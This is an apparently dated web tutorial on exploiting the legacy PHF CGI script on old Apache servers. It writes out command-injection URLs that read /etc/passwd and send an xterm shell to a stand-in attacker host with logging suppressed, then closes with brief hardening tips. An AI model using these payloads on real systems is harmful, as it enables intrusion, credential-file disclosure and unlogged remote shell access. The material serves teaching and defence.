Intoduction
An attacker can get a shell if if you just only have a single service running on the server at port 80 i.e. HTTPD. Now, In this scenario a single vulnerability in the server that allows an attacker to execute a command is sufficient for an intelligent hacker to gain interactive shell access.
Lets say if the target server is running a script called PHF or any other script or program that allows an attacker to execute commands. So, in this tutorial we are considering that the target server is running PHF script that used to come default with the older versions of Apache web server, and UNIX X Windows system. X is a windowing facility that allows many different programs to share a graphical display which is extremely robust and allows X based client programs to display their output to the local X server or to a remote X server running on ports 6000-6003.
Preparing for the attack
Now, in this scenario the attacker would take the advantage of the PHF exploit and one of the most useful X client to attackers called xterm. Xterm is an utility which is used to start a local command shell while running X. However, by enabling the -display option, the attacker can direct a command line shell to the attacker's X server.
Before we move further you might want to take a look at PHF exploit. In order to execute a command on the server the attacker would request for a URL using his browser at port 80 to the target server that looks something like:
http://target's.i.p.address/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Lets take a closer look at above URL. The URL would execute the command 'cat /etc/passwd' on the remote web server and display the contents of /etc/passwd file to the attacker. Additionally, %20 is used at the place of spaces as %20 is the hex value of space.
Executing the attack
Now, the attacker needs to execute the command '/usr/X11R6/bin/xterm -ut -display evil.attacker's.i.p:0.0' by requesting for the following URL:
http://target's.i.p.address/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20evil.attacker's.i.p:0.0
After the exploit has been executed successfully the remote web server will simply execute the xterm with -display and -ut option enabled and display it back to the attacker's X server with the window id of 0 and screen id of 0. The activity will not be logged by the system as -ut option was enabled. Voila! The attacker has now gained interactive shell access and total control over the system.
Additional security tips
However, the protection against such attacks is extremely difficult. So, the best way is to make your self secure by removing unnecessary programs and services. You can increase your security and protect against such attacks by removing X from your system. Due to the vulnerabilities in X binaries, local users may also escalate their privileges to root besides shovelling xterm to remote attacker.
